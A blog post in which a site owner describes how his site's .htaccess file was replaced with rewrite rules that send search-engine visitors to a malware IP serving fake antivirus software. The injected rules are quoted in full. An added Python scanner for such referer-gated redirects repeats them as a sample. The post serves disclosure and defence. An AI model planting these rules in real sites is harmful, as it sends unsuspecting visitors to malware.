My Website Got Hacked!
Anybody who was referred to www.RiskyThinking.com (or some other sites) through a search engine was redirected to a Russian malware site for a fake “AntiVirus” scanner. Searching around the net, it appears that other sites hosted at IX Web Hosting (ixwebhosting.com) were also hacked.
It was quite a cunning plan. For the technically inclined, the “.htaccess” file was replaced with the text:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
which, for those who don’t speak Apache (Web Server Dialect), means:
Redirect everybody who came here from a search engine to a malware site.
The cunning part being that if I visited my own site from a bookmark, a hyperlink, or by typing in the URL, it should have appeared normal. In fact, due to an error, the site crashed, which is how I noticed the problem. A visitor who found the site through a search engine also took the trouble to email me a warning that the site had been hacked – Thanks Paul.
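For site owners who want to check their own “.htaccess” files for this pattern, here is an added example (not part of the original post): a Python scanner that flags any RewriteRule sending visitors to an external host only when a RewriteCond on HTTP_REFERER precedes it. The function name, the sample strings and the example.org host are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

DIRECTIVE = re.compile(r"^\s*(RewriteCond|RewriteRule)\s+(\S+)\s+(\S+)", re.I)

# Constructed samples: a shortened copy of the injected rules quoted above,
# and a benign file (hotlink protection plus an HTTPS redirect to our own host).
INJECTED = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
"""
BENIGN = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !example\.org [NC]
RewriteRule \.(jpg|png)$ - [F]
RewriteCond %{HTTPS} off
RewriteRule (.*) https://www.example.org/$1 [R=301,L]
"""

def find_referer_redirects(htaccess_text, own_hosts=()):
    """Return (line_no, target, referer_patterns) for every RewriteRule that
    redirects to an external host only when the Referer header matches."""
    own = {h.lower() for h in own_hosts}
    findings, referer_patterns = [], []
    for line_no, line in enumerate(htaccess_text.splitlines(), 1):
        m = DIRECTIVE.match(line)
        if not m:
            continue  # comments, blank lines and other directives
        name, arg1, arg2 = m.group(1).lower(), m.group(2), m.group(3)
        if name == "rewritecond":
            if "%{http_referer}" in arg1.lower():
                referer_patterns.append(arg2)
            continue
        # RewriteRule: the conditions collected so far apply to this rule only.
        host = (urlsplit(arg2).hostname or "").lower()
        if referer_patterns and host and host not in own:
            findings.append((line_no, arg2, referer_patterns))
        referer_patterns = []  # start a fresh list for the next rule
    return findings

if __name__ == "__main__":
    for line_no, target, patterns in find_referer_redirects(INJECTED):
        print(f"line {line_no}: referer-gated redirect to {target} for {patterns}")
```

Pass your own hostnames in own_hosts so that referer-based redirects within your own site are not reported.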
There unfortunately isn’t any way to tell the visitors who got redirected what happened.
I’ve been through my log files, checked the access logs, changed passwords, and concluded the security breach wasn’t due to a security hole in my website or carelessness on my part.
All I can really do now is warn other site owners of this exploit (via this posting), and
I would like to apologize to
people I do not know
and cannot know
for an unknown error
made by an unknown person.
That sounds almost like the poetry of Donald Rumsfeld.